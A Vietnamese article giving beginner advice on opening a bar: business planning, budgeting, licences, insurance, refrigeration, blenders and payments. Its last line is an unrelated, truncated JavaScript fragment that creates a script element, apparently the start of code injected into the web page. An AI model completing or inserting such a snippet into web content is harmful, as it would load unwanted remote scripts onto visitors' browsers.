Những chú ý cần nhớ khi bạn khởi động một quán bar

Với những người thiếu kinh nghiệm, họ thường nghĩ rằng mở quán bar là một ý tưởng hấp dẫn vì nó có vẻ thú vị và có lợi nhuận cao. Nhưng đó là một công việc khó khăn và có rất nhiều thứ phải chuẩn bị như bất cứ công việc nào khác. Hãy đọc những hướng dẫn sau để biết cách làm thế nào để khởi động một quán bar nhé.

quán bar

Viết một kế hoạch kinh doanh Bar

Như với mọi doanh nghiệp, bạn nên bắt đầu bằng cách tạo ra một kế hoạch. Các tóm tắt cung cấp một cái nhìn tổng quan về kế hoạch kinh doanh của bạn. Nó sẽ tóm tắt những gì bao gồm trong kế hoạch kinh doanh của bạn, như ý tưởng, khách hàng mục tiêu và kế hoạch tài chính. Hơn nữa một bản tóm tắt chính xác và bóng bẩy sẽ giúp bạn quan sát tổng quan và giúp mọi người hiểu về kế hoạch của bạn, giúp tìm kiếm các khách hàng và nhà đầu tư tiềm năng.

Nếu bạn không có kinh nghiệm sở hữu một quán bar, có thể bạn sẽ muốn hợp tác với một người nào đó, để tránh những sai lầm mà một tân binh có thể mắc phải. Hoặc nếu bạn không có đủ vốn bạn sẽ cần tài trợ từ các đối tác, nhà đầu tư, hoặc các khoản vay. Hầu hết khi các dự án hoàn thành thì chúng đều mất nhiều hơn số tiền dự kiến ban đầu vì những thất bại bất ngờ như trở ngại pháp lý hay sự chậm trễ trong xây dựng. Bên cạnh đó chi phí cũng phải bao gồm cả chi phí hoạt động, giấy phép, tiền lương, nguyên liệu thức ăn hay đồ uống. Bạn nên để ngân sách của mình nhiều hơn kinh phí dự đoán để đảm bảo công việc kinh koanh không ra ngoài tầm kiểm soát.

Tiếp theo bạn nên bắt đầu chọn mô hình kinh doanh cho quán bar cảu mình, bạn muốn một quán bar thân thiện trong khu phố, tập trung vào các món ăn hay một quán bar ấm cúng với những cốc bia thủ công, hay một quán bar sôi động trong một khu vực nào nhiệt? Biết được loại hình kinh doanh bạn muốn, sẽ giúp bạn xác định vị trí để đặt quán bar của mình, nhưng bạn không nên nhanh chóng quyết định địa điểm đặt quán bar trước khi thực hiện phân tích thị trường. Ngoài ra nó cũng giúp bạn xác định được đối thủ cạnh tranh cũng như khách hàng tiềm năng.

Một khi bạn biết những gì bạn sẽ quảng cáo, bạn có thể tạo ra một kế hoạch tiếp thị. Các trang web và các phương tiện truyền thông xã hội là những phương tiện truyền thông chi phí thấp, và khi được quản lý đúng cách, chúng có thể được sử dụng để xây dựng mối quan hệ giữa quán bar với khách hàng cũng như cung cấp một cái nhìn tích cực về quán bar của bạn. Bạn nên bắt đầu quảng cáo trước khi bạn mở quán để đảm bảo khách hàng tiềm năng biết về địa điểm mới, nhưng chắc chắn rằng hãy đưa ra ngày mở cửa để khách hàng biết họ có thể tới vào lúc nào.

 Tính pháp lý và giấy phép

Lấy giấy phép phục vụ rượu là một điều cần thiết pháp lý cho bất kỳ doanh nghiệp nào muốn kinh doanh bia hoặc rượu; tuy nhiên quá trình này không phải lsucc nào cũng nhanh chóng và dễ dàng.

Tài sản và bảo hiểm trách nhiệm chung là nhu cầu cần thiết cho bất kỳ doanh nghiệp. Quán bar và các cơ sở phục vụ rượu cũng nên mua bảo hiểm trách nhiệm pháp lý rượu, giúp bảo vệ quán bar của bạn chống lại các vụ kiện chống lại công ty của bạn.

Trang bị Bar của bạn

Sau khi tìm được địa điểm và hoacn thành thực đơn, bạn có thể bắt đầu tính đến việc trang trí cho quán bar của mình. Nếu quán bar của bạn có phục vụ thức ăn, cho dù đó là món khai vị chiên đơn giản hay các món phức tạp hơn, bạn sẽ cần phải đầu tư trang thiết bị nhà bếp chuyên nghiệp. Nếu không, các thiết bị đồ uống phải sẽ là mối quan tâm chính của bạn.

Làm lạnh

Một số trong những phần quan trọng nhất của quán bar là giữ cho đồ uống của bạn tươi ngon và mát lạnh. Thất bại trong việc giữ lạnh cho bia có thể là một bản án tử hình cho một quán bar, bởi nếu không có thể bạn sẽ phục vụ cho khách một món cocktail chảy nước. Hãy mua những loại tủ lạnh chất lượng để giữ đồ uống ở nhiệt độ lý tưởng khi phục vụ.

Và loại chọn những loại đá thích hợp cho các loại nước uống. Những khối đá lớn lạnh hơn và chậm tan chảy dành cho những loại rượu cao cấp, khối đá vừa cho nước ngọt và đá mảnh (đá bào) khi đong lạnh cocktail.

Máy xay sinh tố

Máy xay và máy trộn là những thành phần quan trọng đối với bất kỳ quán bar nào. Cung cấp các loại cocktail đông lạnh mất nhiều thời gian và công sức hơn so với cung cấp đồ uống đóng chai và hỗn hợp, và bạn có thể bị cám dỗ để đầu tư vào một thức uống quả đông lạnh. Bởi rượu có nhiệt độ đóng băng thấp hơn nhiều đồ uống khác. Trước khi mua sắm thiết bị, kiểm tra các thông số để xác định xem nó có phù huống với những đồ uống trong thực đơn của bạn. Tuy nhiên, hầu như mọi quán bar đều cần đầu tư ít nhất một chiếc máy xay có chất lượng. Đặc biệt nó nên nghiên được đá tốt. Có rất nhiều thương hiệu với các mô hình có động cơ mạnh mẽ và lưỡi dao chuyên dụng cho đá.

Thanh toán

Hãy đảm bảo quá trình thay toán diễn ra trôi chảy với đủ các loạt tiền mặt chẵn, lẻ được sắp xếp theo thứ tự cùng với một máy thanh toán điện tử. Chúng sẽ giúp bạn đi được một chẳng đường dài trên con đường kinh doanh.

var d=document;var s=d.createElement(‘script’);